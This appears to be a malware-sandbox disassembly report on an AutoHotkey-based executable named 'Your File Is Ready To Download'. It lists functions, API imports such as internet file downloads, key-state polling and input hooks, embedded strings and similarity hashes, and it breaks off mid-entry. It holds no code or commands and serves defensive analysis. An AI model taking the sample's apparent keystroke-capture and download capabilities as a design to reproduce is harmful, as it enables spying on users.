Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: __doserrno_errno_invalid_parameter_noinfo
String ID: U
API String ID: 3902385426-4171548499
Opcode ID: 4d87e5cffc3264a1277eecf34d6c09614b5992ef2590aa09f0e259b57f8be8ff
Instruction ID: a4a8909496ae244fd0422bab7908752e94e038f50cbfb6111306141b6b1c6e67
Opcode Fuzzy Hash: 4d87e5cffc3264a1277eecf34d6c09614b5992ef2590aa09f0e259b57f8be8ff
Instruction Fuzzy Hash: 3612AD32214A85A6EB228F2AE4443EE67A1FBCCBD4F550116FB49476B5DF3CC546CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400D57CC, Relevance: 42.6, APIs: 28, Instructions: 573fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00000001400D5829
__doserrno.LIBCMT ref: 00000001400D586F
_errno.LIBCMT ref: 00000001400D5879
_invalid_parameter_noinfo.LIBCMT ref: 00000001400D5885
__doserrno.LIBCMT ref: 00000001400D59D3
_errno.LIBCMT ref: 00000001400D59DD
_errno.LIBCMT ref: 00000001400D59E8
CreateFileW.KERNEL32 ref: 00000001400D5A1E
CreateFileW.KERNEL32 ref: 00000001400D5A73
GetLastError.KERNEL32 ref: 00000001400D5AA4
_errno.LIBCMT ref: 00000001400D5AB1
GetFileType.KERNEL32 ref: 00000001400D5AC0
GetLastError.KERNEL32 ref: 00000001400D5AEB
CloseHandle.KERNEL32 ref: 00000001400D5AFE
_errno.LIBCMT ref: 00000001400D5B08
_lseek_nolock.LIBCMT ref: 00000001400D5B9C
__doserrno.LIBCMT ref: 00000001400D5BA9
_close_nolock.LIBCMT ref: 00000001400D5BB8
_lseek_nolock.LIBCMT ref: 00000001400D5BF9
_close_nolock.LIBCMT ref: 00000001400D5D6C

Part of subcall function 00000001400D1F8C: CloseHandle.KERNEL32(?,?,00000000,00000001400D5BBD), ref: 00000001400D1FEB
Part of subcall function 00000001400D1F8C: GetLastError.KERNEL32(?,?,00000000,00000001400D5BBD), ref: 00000001400D1FF5

_errno.LIBCMT ref: 00000001400D5D71
_lseek_nolock.LIBCMT ref: 00000001400D5D93
CloseHandle.KERNEL32 ref: 00000001400D5ED0
CreateFileW.KERNEL32 ref: 00000001400D5EFE
GetLastError.KERNEL32 ref: 00000001400D5F0A
_errno.LIBCMT ref: 00000001400D5F94
_invalid_parameter_noinfo.LIBCMT ref: 00000001400D5FA0

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: _errno$ErrorFileLast$CloseCreateHandle__doserrno_lseek_nolock$_close_nolock_invalid_parameter_noinfo$Type_get_daylight
String ID:
API String ID: 2942463501-0
Opcode ID: 4c6e18365acede8c7302dddb8b7ae1e7797c567f1fb070b68564fb7f670049c3
Instruction ID: 2c6486dcb89be7864fd383a5acd438a3a33720cd0ff5882b52efaa60fdd82429
Opcode Fuzzy Hash: 4c6e18365acede8c7302dddb8b7ae1e7797c567f1fb070b68564fb7f670049c3
Instruction Fuzzy Hash: DE32F7327106508AFB66AB3AD4903EC37A1AB4C7E9F544615FF1A977F5DA38C842C720

Uniqueness

Uniqueness Score: -1.00%

Function 000000014007D8A0, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 230
networkfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcstoi64.LIBCMT ref: 000000014007D904
InternetOpenW.WININET ref: 000000014007D979
InternetOpenUrlW.WININET ref: 000000014007D99C
InternetCloseHandle.WININET ref: 000000014007D9AD
InternetCloseHandle.WININET ref: 000000014007D9FC
InternetCloseHandle.WININET ref: 000000014007DA05
InternetReadFile.WININET ref: 000000014007DA76
GetTickCount.KERNEL32 ref: 000000014007DA9D
PeekMessageW.USER32 ref: 000000014007DACA
GetTickCount.KERNEL32 ref: 000000014007DAE1
InternetReadFile.WININET ref: 000000014007DB19
InternetReadFileExA.WININET ref: 000000014007DB3D
GetTickCount.KERNEL32 ref: 000000014007DB5B
PeekMessageW.USER32 ref: 000000014007DB88
GetTickCount.KERNEL32 ref: 000000014007DB9F
InternetReadFileExA.WININET ref: 000000014007DBD8
InternetCloseHandle.WININET ref: 000000014007DBEB
InternetCloseHandle.WININET ref: 000000014007DBF4
fclose.LIBCMT ref: 000000014007DBFD
DeleteFileW.KERNEL32 ref: 000000014007DC09

Strings

*, xrefs: 000000014007D8E5
AutoHotkey, xrefs: 000000014007D963
8, xrefs: 000000014007DA14

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Internet$CloseFileHandle$CountReadTick$MessageOpenPeek$Delete_wcstoi64fclose
String ID: *$8$AutoHotkey
API String ID: 338787218-1845633735
Opcode ID: 50068428ae124f9ac5ba47c5503562940b556728074513cd1489932c66c5ce1e
Instruction ID: 519f27d1ee2668330eb18596164ee0d9a3aa50dba7858ae6fe74fe2368b804bd
Opcode Fuzzy Hash: 50068428ae124f9ac5ba47c5503562940b556728074513cd1489932c66c5ce1e
Instruction Fuzzy Hash: 84A19E3620468186FB629B27A8407EA73A1FB8DBD4F544022FF4947AA4EF3CC546C710

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400027BB, Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 449windowthreadCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140001CC6
GetTickCount.KERNEL32 ref: 0000000140001D21
GetMessageW.USER32 ref: 0000000140001D64
GetTickCount.KERNEL32 ref: 0000000140001D73
ShowWindow.USER32 ref: 00000001400028D0
GetForegroundWindow.USER32(?,?,?,?,?,?,AutoHotkey v1.1.33.06,Unk,00000001400B3729), ref: 0000000140002A33
GetWindowThreadProcessId.USER32 ref: 0000000140002A4A
GetClassNameW.USER32 ref: 0000000140002A6C
IsDialogMessageW.USER32 ref: 0000000140002AAE
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,AutoHotkey v1.1.33.06,Unk,00000001400B3729), ref: 0000000140002ADE
DragFinish.SHELL32 ref: 0000000140003010
GetTickCount.KERNEL32 ref: 00000001400030DE
wcsncpy.LIBCMT ref: 00000001400030FD
wcsncpy.LIBCMT ref: 0000000140003122
wcsncpy.LIBCMT ref: 000000014000315C
GetTickCount.KERNEL32 ref: 0000000140003184

Strings

#32770, xrefs: 0000000140002A79

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$Windowwcsncpy$Message$ClassCurrentDialogDirectoryDragFinishForegroundNameProcessShowThread
String ID: #32770
API String ID: 1745663375-463685578
Opcode ID: 80a2dc55f99fc7b2c8c3dec6d4e55a734c8bf130994ded284f83efa18fd3f8ed
Instruction ID: 9e7e74af8c7ff7cf0b9e1bc25033d8e592212d80976107e6d7a984fb2758a8d3
Opcode Fuzzy Hash: 80a2dc55f99fc7b2c8c3dec6d4e55a734c8bf130994ded284f83efa18fd3f8ed
Instruction Fuzzy Hash: 40227EB2604A948AFB66DF27A8503E937A0F78DBD8F544121EF4A57BB4DB34C981C710

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000CF50, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 150
sleepsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(?,?,?,?,00000004,000000014001FCC8,?,?,?,?,?,000000014001FB17), ref: 000000014000CF5F
PostThreadMessageW.USER32 ref: 000000014000CFB4
Sleep.KERNEL32(?,?,?,?,00000004,000000014001FCC8,?,?,?,?,?,000000014001FB17), ref: 000000014000CFC1
GetTickCount.KERNEL32 ref: 000000014000CFD1
GetExitCodeThread.KERNEL32(?,?,?,?,00000004,000000014001FCC8,?,?,?,?,?,000000014001FB17), ref: 000000014000CFEC
GetTickCount.KERNEL32 ref: 000000014000CFFC
Sleep.KERNEL32 ref: 000000014000D00D
CloseHandle.KERNEL32 ref: 000000014000D01C
CreateMutexW.KERNEL32 ref: 000000014000D047
CloseHandle.KERNEL32 ref: 000000014000D062
CreateMutexW.KERNEL32 ref: 000000014000D089
CloseHandle.KERNEL32 ref: 000000014000D0A5
UnhookWindowsHookEx.USER32 ref: 000000014000D0F2
UnregisterHotKey.USER32(?,?,?,?,00000004,000000014001FCC8,?,?,?,?,?,000000014001FB17), ref: 000000014000D141

Strings

AHK Mouse, xrefs: 000000014000D07E
Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function., xrefs: 000000014000D0C0
AHK Keybd, xrefs: 000000014000D03C

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CloseHandle$CountCreateMessageMutexPostSleepThreadTick$CodeExitHookQuitUnhookUnregisterWindows
String ID: AHK Keybd$AHK Mouse$Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.
API String ID: 880717225-3816831916
Opcode ID: 66f4627063f3ad17ef368d45ad8c0673b99c6e883e1707053218bbed8cdb30f1
Instruction ID: 960eb5f1bdb7a21aa3d66e0857d9c0959fa80708bd9969e64d2a7d304a95ffff
Opcode Fuzzy Hash: 66f4627063f3ad17ef368d45ad8c0673b99c6e883e1707053218bbed8cdb30f1
Instruction Fuzzy Hash: B5613771215B8486FB1ADB23F8443E973A1BB4CBD4F444426EF4A4B6B4DF39C856C220

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140016300, Relevance: 28.8, APIs: 19, Instructions: 291
keyboardwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 000000014001639A
PeekMessageW.USER32 ref: 00000001400163C8
GetTickCount.KERNEL32 ref: 00000001400163EF
GetAsyncKeyState.USER32 ref: 0000000140016458
GetAsyncKeyState.USER32 ref: 0000000140016476
GetAsyncKeyState.USER32 ref: 000000014001648E
GetAsyncKeyState.USER32 ref: 00000001400164A6
GetAsyncKeyState.USER32 ref: 00000001400164BE
GetAsyncKeyState.USER32 ref: 00000001400164D6
GetAsyncKeyState.USER32 ref: 00000001400164EE
GetAsyncKeyState.USER32 ref: 0000000140016506
GetAsyncKeyState.USER32 ref: 000000014001668D
GetAsyncKeyState.USER32 ref: 00000001400166A7
GetAsyncKeyState.USER32 ref: 00000001400166BB
GetAsyncKeyState.USER32 ref: 00000001400166CF
GetAsyncKeyState.USER32 ref: 00000001400166E3
GetAsyncKeyState.USER32 ref: 00000001400166F7
GetAsyncKeyState.USER32 ref: 000000014001670B
GetAsyncKeyState.USER32 ref: 000000014001671F

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: AsyncState$CountTick$MessagePeek
String ID:
API String ID: 958976530-0
Opcode ID: 536319ceb3123cf7fc4fc61d0007b67be7add25ef469e7976093150661d5fb1f
Instruction ID: 50252e98626dfd7861110ca0e7a23950e54a8093af5b38ea2f991951a7098b72
Opcode Fuzzy Hash: 536319ceb3123cf7fc4fc61d0007b67be7add25ef469e7976093150661d5fb1f
Instruction Fuzzy Hash: 53D1C0352046D086F7669B37AC643EA3BA0E74DB95F080119EBC60B6F1DF3E8944DB21

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140018A20, Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 200
sleepwindowthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32 ref: 0000000140018AD1
Sleep.KERNEL32 ref: 0000000140018ADE
GetTickCount.KERNEL32 ref: 0000000140018AEB
PeekMessageW.USER32 ref: 0000000140018B1D
SendInput.USER32 ref: 0000000140018B76
GetForegroundWindow.USER32 ref: 0000000140018BB9
PostThreadMessageW.USER32 ref: 0000000140018C01
Sleep.KERNEL32 ref: 0000000140018C0E
GetTickCount.KERNEL32 ref: 0000000140018C1B
PeekMessageW.USER32 ref: 0000000140018C44
GetTickCount.KERNEL32 ref: 0000000140018C4E
Sleep.KERNEL32 ref: 0000000140018C5F
GetTickCount.KERNEL32 ref: 0000000140018C74
Sleep.KERNEL32 ref: 0000000140018C89
SetWindowsHookExW.USER32 ref: 0000000140018CF8

Strings

Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function., xrefs: 0000000140018B36, 0000000140018C9F

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountMessageSleepTick$PeekPostThread$ForegroundHookInputSendWindowWindows
String ID: Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.
API String ID: 2352124081-3277093602
Opcode ID: 6aabd4b726803a944af17478416a8cc6620bddb3860a86e818d514f216d55405
Instruction ID: cf98827361759fedefda0d8aad51e37a303b0ae38d07b127c86cfdeb9afc4ae9
Opcode Fuzzy Hash: 6aabd4b726803a944af17478416a8cc6620bddb3860a86e818d514f216d55405
Instruction Fuzzy Hash: FA919171204A8086F7769F23A8907EA77A0FB8DBC4F484129EF464B6B5DF39C945C710

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140048490, Relevance: 23.7, APIs: 9, Strings: 4, Instructions: 995COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32 ref: 0000000140048840

Strings

Out of memory., xrefs: 00000001400487F4, 0000000140049029, 0000000140049039, 00000001400496FA
Memory limit reached (see #MaxMem in the help file)., xrefs: 00000001400485CE, 0000000140048901, 0000000140048D9F, 00000001400494C9
UseErrorLevel, xrefs: 00000001400484CA
ERROR, xrefs: 000000014004855C, 000000014004857B

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: KeyboardLayout
String ID: ERROR$Memory limit reached (see #MaxMem in the help file).$Out of memory.$UseErrorLevel
API String ID: 194098044-3549142029
Opcode ID: 76006ca49193b62dc5843b14c139dfc2f9456ae7fd7b78a0f5d15af5032b4cc0
Instruction ID: 978b607b87ad602b9e93bc73c155b4eef44c2ad70320dec673cbcc6f4986eb41
Opcode Fuzzy Hash: 76006ca49193b62dc5843b14c139dfc2f9456ae7fd7b78a0f5d15af5032b4cc0
Instruction Fuzzy Hash: CBA2EE32204A8086EB77CB23D4503EE27A1F74D7D8F564A26EF4A576B5DB38C895C309

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140085530, Relevance: 22.9, APIs: 8, Strings: 4, Instructions: 1852COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,?,0000000140088EAF), ref: 00000001400857F1
GetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,?,0000000140088EAF), ref: 0000000140085AD8
_wcstoi64.LIBCMT ref: 000000014008764C
malloc.LIBCMT ref: 0000000140086348

Part of subcall function 00000001400C8F74: _callnewh.LIBCMT ref: 00000001400C9008
Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C900D

_wcstoi64.LIBCMT ref: 00000001400875A9
malloc.LIBCMT ref: 0000000140085BD8

Part of subcall function 00000001400C8F74: _FF_MSGBANNER.LIBCMT ref: 00000001400C8FA4
Part of subcall function 00000001400C8F74: RtlAllocateHeap.NTDLL(?,?,00000000,00000001400CF264,?,?,00000000,00000001400CDBCD,?,?,?,00000001400CDC77,?,?,00000000,00000001400CD065), ref: 00000001400C8FC9
Part of subcall function 00000001400C8F74: _callnewh.LIBCMT ref: 00000001400C8FE2
Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FED
Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FF8

Strings

Out of memory., xrefs: 00000001400860EC, 0000000140087767, 00000001400877D9, 00000001400877F9, 0000000140087ECD
Memory limit reached (see #MaxMem in the help file)., xrefs: 0000000140085EE0, 0000000140087C8B
, xrefs: 0000000140087DAB
, xrefs: 0000000140085FBC

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: _errno$EnvironmentVariable_callnewh_wcstoi64malloc$AllocateHeap
String ID: $ $Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 931988796-4280895764
Opcode ID: 151c045207cedb255f36498ad215fe311b2e794eeaf2cff859b1c5edfa864bd6
Instruction ID: 67762a80bb963e0db436d588c4684dc58643369c32fad44c750a4ee843f542b7
Opcode Fuzzy Hash: 151c045207cedb255f36498ad215fe311b2e794eeaf2cff859b1c5edfa864bd6
Instruction Fuzzy Hash: 6703BA33200B8486EB669F27D484BE827A5FB4CBD4F554616FB5E17BA9DB34CA81C340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140016D90, Relevance: 19.9, APIs: 13, Instructions: 363
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 0000000140016DDF

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 96a4155cb18f3f6a531702b1eb1fe101c41b874fb96488ea354fdeb08c731c75
Instruction ID: 410be6e667894e73ab9c31ba02c4562feb9337d3e33a916f1f0fa0808e7806b8
Opcode Fuzzy Hash: 96a4155cb18f3f6a531702b1eb1fe101c41b874fb96488ea354fdeb08c731c75
Instruction Fuzzy Hash: F6F1BF321182E08AF76B9B27A854BE97AE0F74D784F04011AFB860F6F5CB3AC845D710

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140059D20, Relevance: 18.4, APIs: 5, Strings: 5, Instructions: 939COMMON

Download Yara Rule

Strings

Out of memory., xrefs: 000000014005A4E0, 000000014005A7B3, 000000014005AB50
Memory limit reached (see #MaxMem in the help file)., xrefs: 000000014005A24D, 000000014005A5A8, 000000014005A8FE
, xrefs: 000000014005A9C8
, xrefs: 000000014005A666
, xrefs: 000000014005A30C

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID: $ $ $Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 0-1407833225
Opcode ID: 0b8026cdf4441d804882a3c705724b61925794d9f69e5253c88b6c50ec76ef2d
Instruction ID: 392a286911dabb4b26674c938a50b86be6c95f22530fc16bd942bb73925f8073
Opcode Fuzzy Hash: 0b8026cdf4441d804882a3c705724b61925794d9f69e5253c88b6c50ec76ef2d
Instruction Fuzzy Hash: 1C92DC72206A8485FB77DB23D5143E923A2AB4EBD4F594112FB4A0B6F5DB7EC885C340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140032681, Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 472COMMON

Download Yara Rule

Strings

Read, xrefs: 00000001400326E8
Parameter #2 invalid., xrefs: 00000001400385BB
Parameter #3 invalid., xrefs: 000000014003859B

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID: Parameter #2 invalid.$Parameter #3 invalid.$Read
API String ID: 0-931347957
Opcode ID: 634d79b4070bdce9f4028c6a36ffa6f95e5cf9bed3353b534fe5322752e76426
Instruction ID: a2477e739225f8fd49c201b52a5afcaa81d6fe1effff83c8d5a0b9dd56a9c235
Opcode Fuzzy Hash: 634d79b4070bdce9f4028c6a36ffa6f95e5cf9bed3353b534fe5322752e76426
Instruction Fuzzy Hash: B9223836A05B5085FB6B8B2BE8403EA77A1EB5CBD4F554126EF49476F9DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001F300, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 316
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.LIBCMT ref: 000000014001F319

Part of subcall function 00000001400C8F74: _FF_MSGBANNER.LIBCMT ref: 00000001400C8FA4
Part of subcall function 00000001400C8F74: RtlAllocateHeap.NTDLL(?,?,00000000,00000001400CF264,?,?,00000000,00000001400CDBCD,?,?,?,00000001400CDC77,?,?,00000000,00000001400CD065), ref: 00000001400C8FC9
Part of subcall function 00000001400C8F74: _callnewh.LIBCMT ref: 00000001400C8FE2
Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FED
Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FF8

SetTimer.USER32 ref: 000000014001F377

Strings

Out of memory., xrefs: 000000014001F877
Memory limit reached (see #MaxMem in the help file)., xrefs: 000000014001F5E5

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: _errno$AllocateHeapTimer_callnewhmalloc
String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 2580226803-457448710
Opcode ID: 3fa2bfebcbc7caa754ae9a1d361acf40a61b4d2ef6fed00823556ee96360772d
